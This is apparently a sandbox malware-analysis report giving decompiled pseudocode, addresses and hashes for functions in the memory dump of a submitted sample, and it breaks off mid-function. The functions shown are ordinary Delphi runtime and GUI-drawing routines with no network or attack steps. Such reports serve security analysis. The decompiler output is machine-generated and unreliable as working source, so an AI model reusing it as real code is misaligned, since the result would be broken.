										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t318);
										 *[fs:eax] = _t318;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 2);
							goto L46;
						}
					} else {
						_v13 = E00416314(0, 1);
						goto L46;
					}
				} else {
					if(_t338 != 0) {
						if(_t338 != 1) {
							if(E0041713C( *_v8,  &_v28) != 0) {
								_push( &_v16);
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_push( &_v44);
									L0040F318();
									_push(_t346);
									_push(0x41686d);
									_push( *[fs:eax]);
									 *[fs:eax] = _t349;
									_t284 =  *_t256 & 0x0000ffff;
									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
									if((_v44 & 0x00000fff) !=  *_t256) {
										E0041015C(_t284);
									}
									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
									_pop(_t325);
									 *[fs:eax] = _t325;
									_push(0x416ae8);
									return E004109E8( &_v44);
								} else {
									if( *_t256 == _v16) {
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4167df);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t289 = _v16 & 0x0000ffff;
										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
										if((_v44 & 0x00000fff) != _v16) {
											E0041015C(_t289);
										}
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
										_pop(_t333);
										 *[fs:eax] = _t333;
										_push(0x416ae8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 0);
							goto L46;
						}
					} else {
						_v13 = E00416314(1, 0);
						L46:
						return _v13;
					}
				}
			}























                                                    0x004166d4
                                                    0x004166d5
                                                    0x004166d7
                                                    0x004166dc
                                                    0x004166df
                                                    0x004166e2
                                                    0x004166e4
                                                    0x004166e8
                                                    0x004166f5
                                                    0x00416877
                                                    0x0041687d
                                                    0x00416897
                                                    0x004168b9
                                                    0x004168c8
                                                    0x004168db
                                                    0x00416991
                                                    0x0041699e
                                                    0x00416a15
                                                    0x00416a24
                                                    0x00416a36
                                                    0x00416ae3
                                                    0x00000000
                                                    0x00416a3c
                                                    0x00416a43
                                                    0x00416ade
                                                    0x00000000
                                                    0x00416a45
                                                    0x00416a48
                                                    0x00416a49
                                                    0x00416a50
                                                    0x00416a51
                                                    0x00416a56
                                                    0x00416a59
                                                    0x00416a5c
                                                    0x00416a65
                                                    0x00416a72
                                                    0x00416a74
                                                    0x00416a74
                                                    0x00416a9c
                                                    0x00416aa1
                                                    0x00416aa4
                                                    0x00416aa7
                                                    0x00416ab4
                                                    0x00416ab4
                                                    0x00416a43
                                                    0x00416a17
                                                    0x00416a17
                                                    0x00000000
                                                    0x00416a17
                                                    0x004169a0
                                                    0x004169a3
                                                    0x004169a4
                                                    0x004169ab
                                                    0x004169ac
                                                    0x004169b1
                                                    0x004169b4
                                                    0x004169ba
                                                    0x004169c2
                                                    0x004169d1
                                                    0x004169d3
                                                    0x004169d3
                                                    0x004169e6
                                                    0x004169eb
                                                    0x004169ee
                                                    0x004169f1
                                                    0x004169fe
                                                    0x004169fe
                                                    0x004168e1
                                                    0x004168eb
                                                    0x00416986
                                                    0x00000000
                                                    0x004168ed
                                                    0x004168f0
                                                    0x004168f1
                                                    0x004168f8
                                                    0x004168f9
                                                    0x004168fe
                                                    0x00416901
                                                    0x00416904
                                                    0x0041690e
                                                    0x0041691b
                                                    0x0041691d
                                                    0x0041691d
                                                    0x00416944
                                                    0x00416949
                                                    0x0041694c
                                                    0x0041694f
                                                    0x0041695c
                                                    0x0041695c
                                                    0x004168eb
                                                    0x004168bb
                                                    0x004168bb
                                                    0x00000000
                                                    0x004168bb
                                                    0x00416899
                                                    0x004168a5
                                                    0x00000000
                                                    0x004168a5
                                                    0x0041687f
                                                    0x00416888
                                                    0x00000000
                                                    0x00416888
                                                    0x004166fb
                                                    0x004166fe
                                                    0x00416715
                                                    0x0041673b
                                                    0x0041674a
                                                    0x0041675c
                                                    0x00416813
                                                    0x00416814
                                                    0x0041681b
                                                    0x0041681c
                                                    0x00416821
                                                    0x00416824
                                                    0x00416827
                                                    0x00416830
                                                    0x00416840
                                                    0x00416842
                                                    0x00416842
                                                    0x00416854
                                                    0x00416859
                                                    0x0041685c
                                                    0x0041685f
                                                    0x0041686c
                                                    0x00416762
                                                    0x00416769
                                                    0x00416808
                                                    0x00000000
                                                    0x0041676b
                                                    0x0041676e
                                                    0x0041676f
                                                    0x00416776
                                                    0x00416777
                                                    0x0041677c
                                                    0x0041677f
                                                    0x00416782
                                                    0x0041678b
                                                    0x0041679c
                                                    0x0041679e
                                                    0x0041679e
                                                    0x004167c6
                                                    0x004167cb
                                                    0x004167ce
                                                    0x004167d1
                                                    0x004167de
                                                    0x004167de
                                                    0x00416769
                                                    0x0041673d
                                                    0x0041673d
                                                    0x00000000
                                                    0x0041673d
                                                    0x00416717
                                                    0x00416723
                                                    0x00000000
                                                    0x00416723
                                                    0x00416700
                                                    0x00416709
                                                    0x00416ae8
                                                    0x00416af0
                                                    0x00416af0
                                                    0x004166fe

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                    • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                    • Opcode Fuzzy Hash: 52380f3934db917eae4a074d51a237f82e83a3ba5d3f730a33236230b57d628b
                                                    • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00415454 Relevance: 7.8, APIs: 5, Instructions: 271COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E00415454(signed short* __eax, intOrPtr __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				signed int _v18;
				signed int _v20;
				void* _v24;
				void* _v28;
				char _v44;
				void* __ebp;
				void* _t119;
				signed int _t207;
				intOrPtr _t216;
				intOrPtr _t217;
				intOrPtr _t250;
				intOrPtr _t255;
				intOrPtr _t259;
				intOrPtr _t264;
				intOrPtr _t268;
				void* _t271;
				void* _t273;
				intOrPtr _t274;

				_t278 = __fp0;
				_t269 = __edi;
				_t271 = _t273;
				_t274 = _t273 + 0xffffffd8;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t204 =  *_v8;
				if(( *_v8 & 0x00000fff) >= 0x10f) {
					if(E0041713C(_t204,  &_v24) == 0) {
						E0041024C(__ecx);
					}
					_push( &_v20);
					_t216 = _v16;
					if( *((intOrPtr*)( *_v24 + 8))() == 0) {
						_t207 =  *_v12;
						if((_t207 & 0x00000fff) >= 0x10f) {
							if(E0041713C(_t207,  &_v28) != 0) {
								_push( &_v18);
								_t217 = _v16;
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_t119 = E0041024C(_t217);
									goto L40;
								} else {
									if( *_v8 == _v18) {
										_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
										goto L40;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t271);
										_push(0x415779);
										_push( *[fs:eax]);
										 *[fs:eax] = _t274;
										_t219 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, _t269, _t278);
										E00410E14(_v8,  &_v44);
										if( *_v8 != _v18) {
											E0041015C(_t219);
										}
										_pop(_t250);
										 *[fs:eax] = _t250;
										_push(0x415780);
										return E004109E8( &_v44);
									}
								}
							} else {
								_t119 = E0041024C(_t216);
								goto L40;
							}
						} else {
							if(_t207 ==  *_v8) {
								_t119 = E004161B0(_v8, _v16, _v12, _t278);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x4156ca);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t224 =  *_v12 & 0x0000ffff;
								E00411330( &_v44,  *_v12 & 0x0000ffff, _v8, _t269, _t278);
								E00410E14(_v8,  &_v44);
								if( *_v8 !=  *_v12) {
									E0041015C(_t224);
								}
								_pop(_t255);
								 *[fs:eax] = _t255;
								_push(0x4156d1);
								return E004109E8( &_v44);
							}
						}
					} else {
						if( *_v12 == _v20) {
							_t119 =  *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							goto L40;
						} else {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41562f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t228 = _v20 & 0x0000ffff;
							E00411330( &_v44, _v20 & 0x0000ffff, _v12, _t269, _t278);
							if(_v44 != _v20) {
								E0041015C(_t228);
							}
							 *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							_pop(_t259);
							 *[fs:eax] = _t259;
							_push(0x415799);
							return E004109E8( &_v44);
						}
					}
				} else {
					if(E0041713C( *_v12,  &_v28) != 0) {
						_push( &_v18);
						if( *((intOrPtr*)( *_v28 + 4))() == 0) {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41558f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t234 =  *_v8 & 0x0000ffff;
							E00411330( &_v44,  *_v8 & 0x0000ffff, _v12, __edi, __fp0);
							if( *_v8 != _v44) {
								E0041015C(_t234);
							}
							E004161B0(_v8, _v16,  &_v44, _t278);
							_pop(_t264);
							 *[fs:eax] = _t264;
							_push(0x415799);
							return E004109E8( &_v44);
						} else {
							if( *_v8 == _v18) {
								_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x415514);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t239 = _v18 & 0x0000ffff;
								E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
								E00410E14(_v8,  &_v44);
								if( *_v8 != _v18) {
									E0041015C(_t239);
								}
								_pop(_t268);
								 *[fs:eax] = _t268;
								_push(0x41551b);
								return E004109E8( &_v44);
							}
						}
					} else {
						_t119 = E0041024C(__ecx);
						L40:
						return _t119;
					}
				}
			}
























                                                    0x00415454
                                                    0x00415454
                                                    0x00415455
                                                    0x00415457
                                                    0x0041545b
                                                    0x0041545e
                                                    0x00415461
                                                    0x00415467
                                                    0x00415474
                                                    0x004155a5
                                                    0x004155a7
                                                    0x004155a7
                                                    0x004155af
                                                    0x004155b3
                                                    0x004155c0
                                                    0x00415650
                                                    0x0041565d
                                                    0x004156f3
                                                    0x00415702
                                                    0x00415706
                                                    0x00415713
                                                    0x00415794
                                                    0x00000000
                                                    0x00415715
                                                    0x0041571f
                                                    0x0041578f
                                                    0x00000000
                                                    0x00415721
                                                    0x00415724
                                                    0x00415725
                                                    0x0041572c
                                                    0x0041572d
                                                    0x00415732
                                                    0x00415735
                                                    0x00415738
                                                    0x00415742
                                                    0x0041574d
                                                    0x0041575c
                                                    0x0041575e
                                                    0x0041575e
                                                    0x00415765
                                                    0x00415768
                                                    0x0041576b
                                                    0x00415778
                                                    0x00415778
                                                    0x0041571f
                                                    0x004156f5
                                                    0x004156f5
                                                    0x00000000
                                                    0x004156f5
                                                    0x00415663
                                                    0x0041566c
                                                    0x004156da
                                                    0x00000000
                                                    0x0041566e
                                                    0x00415671
                                                    0x00415672
                                                    0x00415679
                                                    0x0041567a
                                                    0x0041567f
                                                    0x00415682
                                                    0x00415688
                                                    0x00415691
                                                    0x0041569c
                                                    0x004156ad
                                                    0x004156af
                                                    0x004156af
                                                    0x004156b6
                                                    0x004156b9
                                                    0x004156bc
                                                    0x004156c9
                                                    0x004156c9
                                                    0x0041566c
                                                    0x004155c6
                                                    0x004155d0
                                                    0x00415645
                                                    0x00000000
                                                    0x004155d2
                                                    0x004155d5
                                                    0x004155d6
                                                    0x004155dd
                                                    0x004155de
                                                    0x004155e3
                                                    0x004155e6
                                                    0x004155e9
                                                    0x004155f3
                                                    0x00415600
                                                    0x00415602
                                                    0x00415602
                                                    0x00415616
                                                    0x0041561b
                                                    0x0041561e
                                                    0x00415621
                                                    0x0041562e
                                                    0x0041562e
                                                    0x004155d0
                                                    0x0041547a
                                                    0x0041548a
                                                    0x00415499
                                                    0x004154aa
                                                    0x00415535
                                                    0x00415536
                                                    0x0041553d
                                                    0x0041553e
                                                    0x00415543
                                                    0x00415546
                                                    0x0041554c
                                                    0x00415555
                                                    0x00415564
                                                    0x00415566
                                                    0x00415566
                                                    0x00415574
                                                    0x0041557b
                                                    0x0041557e
                                                    0x00415581
                                                    0x0041558e
                                                    0x004154b0
                                                    0x004154ba
                                                    0x0041552a
                                                    0x00000000
                                                    0x004154bc
                                                    0x004154bf
                                                    0x004154c0
                                                    0x004154c7
                                                    0x004154c8
                                                    0x004154cd
                                                    0x004154d0
                                                    0x004154d3
                                                    0x004154dd
                                                    0x004154e8
                                                    0x004154f7
                                                    0x004154f9
                                                    0x004154f9
                                                    0x00415500
                                                    0x00415503
                                                    0x00415506
                                                    0x00415513
                                                    0x00415513
                                                    0x004154ba
                                                    0x0041548c
                                                    0x0041548c
                                                    0x00415799
                                                    0x0041579d
                                                    0x0041579d
                                                    0x0041548a

                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 004154C0
                                                    • VariantInit.OLEAUT32(?), ref: 004155D6
                                                      • Part of subcall function 0041713C: RtlEnterCriticalSection.KERNEL32(0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06,?,?,?,?,?,004101DF,00000000), ref: 00417172
                                                      • Part of subcall function 0041713C: RtlLeaveCriticalSection.KERNEL32(0049E828,004171EB,?,0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06), ref: 004171DE
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalInitSectionVariant$EnterLeave
                                                    • String ID:
                                                    • API String ID: 2777075435-0
                                                    • Opcode ID: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                    • Instruction ID: a24615229599b446cf83ad5ef8fc14772df329521493faa61475ffe7701a7f51
                                                    • Opcode Fuzzy Hash: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                    • Instruction Fuzzy Hash: D8B16D79A00609EFDB00EF94C5818EDB7B5FF89714F9040A6E804A7751D738AEC5CB68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004534EC Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E004534EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t196 = __edi;
				_t202 = _t203;
				_push(__ecx);
				_v8 = __eax;
				L0043DF9C(_v8);
				_push(_t203);
				_push(0x453742);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x49e665; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E0043D6F8(_v8, 0, __ecx, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E0043A998(_v8, _t98, _t196, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0043A9DC(_v8, _t100, _t196, _t214);
					}
					_t180 =  *0x453750; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E00452B4C(_v8, 1, 1);
						E004411C8(_v8, 1, 1, _t215);
					}
					E0043C130(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x453749);
					return L0043DFA4(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x49ebbc; // 0x0
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x49ebbc; // 0x0
							E00424FF8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00424FF0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x49ebbc; // 0x0
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E00453874(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E00452B4C(_v8, _t122, _t199);
						E004411C8(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                                    0x004534ec
                                                    0x004534ec
                                                    0x004534ed
                                                    0x004534ef
                                                    0x004534f4
                                                    0x004534fa
                                                    0x00453501
                                                    0x00453502
                                                    0x00453507
                                                    0x0045350a
                                                    0x00453512
                                                    0x0045351d
                                                    0x00453528
                                                    0x0045352e
                                                    0x00453530
                                                    0x0045353a
                                                    0x00453545
                                                    0x00453554
                                                    0x004536b6
                                                    0x004536b9
                                                    0x004536bf
                                                    0x004536c1
                                                    0x004536c8
                                                    0x004536c8
                                                    0x004536d0
                                                    0x004536d6
                                                    0x004536d8
                                                    0x004536df
                                                    0x004536df
                                                    0x004536e7
                                                    0x004536ed
                                                    0x004536f3
                                                    0x004536f5
                                                    0x00453704
                                                    0x00453716
                                                    0x00453716
                                                    0x00453727
                                                    0x0045372e
                                                    0x00453731
                                                    0x00453734
                                                    0x00453741
                                                    0x0045356a
                                                    0x00453574
                                                    0x0045357f
                                                    0x00453588
                                                    0x00453594
                                                    0x004535b4
                                                    0x004535b4
                                                    0x00453588
                                                    0x004535b9
                                                    0x004535c4
                                                    0x004535d2
                                                    0x004535d7
                                                    0x004535dd
                                                    0x004535df
                                                    0x004535e5
                                                    0x004535ee
                                                    0x00453601
                                                    0x00453610
                                                    0x0045362f
                                                    0x0045362f
                                                    0x0045363f
                                                    0x0045365e
                                                    0x0045365e
                                                    0x0045366e
                                                    0x0045368d
                                                    0x004536b0
                                                    0x004536b0
                                                    0x0045366e
                                                    0x00000000
                                                    0x004535df

                                                    APIs
                                                    • MulDiv.KERNEL32(00000000,?,00000000), ref: 004535AB
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453627
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453656
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453685
                                                    • MulDiv.KERNEL32(?,00000000,00000000), ref: 004536A8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                    • Instruction ID: c7ec2d223f710dc91b05457c805857c5415938e4303d673742531becb7789678
                                                    • Opcode Fuzzy Hash: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                    • Instruction Fuzzy Hash: 9171F670A04104EFCB04DFA9C589EADB3F5AF48305F2941FAE808DB362D775AE459B44
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044AF00 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E0044AF00(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x44b0e4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E0044CE98(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0044E4D4(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00404A58( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404DCC(_v16, 0x44b108);
					if(_t153 != 0) {
						E004256F8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c;
							E004250DC( *((intOrPtr*)(_v8 + 0xc)), E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404C80(_v16);
							_t65 = E00404E80(_v16);
							DrawTextA(L00425C68(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x44b0eb);
							return E004049C0( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E00404C80(_v16);
								_t91 = E00404E80(_v16);
								DrawTextA(L00425C68(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E00424950(0xff00000d);
								_t78 = E00424950(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(L00425C68(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404C88( &_v16, 0x44b0fc);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                                    0x0044af00
                                                    0x0044af01
                                                    0x0044af0b
                                                    0x0044af0e
                                                    0x0044af11
                                                    0x0044af14
                                                    0x0044af16
                                                    0x0044af1b
                                                    0x0044af1c
                                                    0x0044af21
                                                    0x0044af24
                                                    0x0044af29
                                                    0x0044af2e
                                                    0x0044af32
                                                    0x0044af42
                                                    0x0044af51
                                                    0x0044af54
                                                    0x0044af59
                                                    0x0044af59
                                                    0x0044af59
                                                    0x0044af44
                                                    0x0044af47
                                                    0x0044af47
                                                    0x0044af5c
                                                    0x0044af5c
                                                    0x0044af68
                                                    0x0044af70
                                                    0x0044af96
                                                    0x0044af9e
                                                    0x0044afa3
                                                    0x0044afe1
                                                    0x0044afe6
                                                    0x0044afea
                                                    0x0044afef
                                                    0x0044affb
                                                    0x0044b003
                                                    0x0044b003
                                                    0x0044b008
                                                    0x0044b00c
                                                    0x0044b0a9
                                                    0x0044b0b1
                                                    0x0044b0ba
                                                    0x0044b0c9
                                                    0x0044b0ce
                                                    0x0044b0d0
                                                    0x0044b0d3
                                                    0x0044b0d6
                                                    0x0044b0e3
                                                    0x0044b012
                                                    0x0044b012
                                                    0x0044b016
                                                    0x0044b020
                                                    0x0044b030
                                                    0x0044b03d
                                                    0x0044b046
                                                    0x0044b055
                                                    0x0044b062
                                                    0x0044b062
                                                    0x0044b067
                                                    0x0044b06b
                                                    0x0044b099
                                                    0x0044b0a4
                                                    0x0044b06d
                                                    0x0044b072
                                                    0x0044b07e
                                                    0x0044b083
                                                    0x0044b085
                                                    0x00000000
                                                    0x00000000
                                                    0x0044b092
                                                    0x0044b092
                                                    0x00000000
                                                    0x0044b06b
                                                    0x0044b00c
                                                    0x0044afa8
                                                    0x0044afb6
                                                    0x0044afb7
                                                    0x0044afb8
                                                    0x0044afb9
                                                    0x0044afba
                                                    0x0044afcf
                                                    0x0044afcf
                                                    0x00000000
                                                    0x0044af72
                                                    0x0044af76
                                                    0x0044af89
                                                    0x0044af91
                                                    0x00000000
                                                    0x0044af91
                                                    0x0044af7e
                                                    0x00000000
                                                    0x00000000
                                                    0x0044af83
                                                    0x0044af87
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0044af87

                                                    APIs
                                                    • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
                                                    • OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
                                                    • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
                                                    • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Draw$OffsetRectText$Edge
                                                    • String ID:
                                                    • API String ID: 3610532707-0
                                                    • Opcode ID: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                    • Instruction ID: ea5abe3bfc9a9df89051e6d8e73c4225462b89b626b3e2b5561302bed16b813c
                                                    • Opcode Fuzzy Hash: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                    • Instruction Fuzzy Hash: C551A3B0A04204AFEB10EBA9D881B9F73E5EF44324F55856BF924A7381C73CED048B59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043F3B8 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E00441704(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43f4d8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
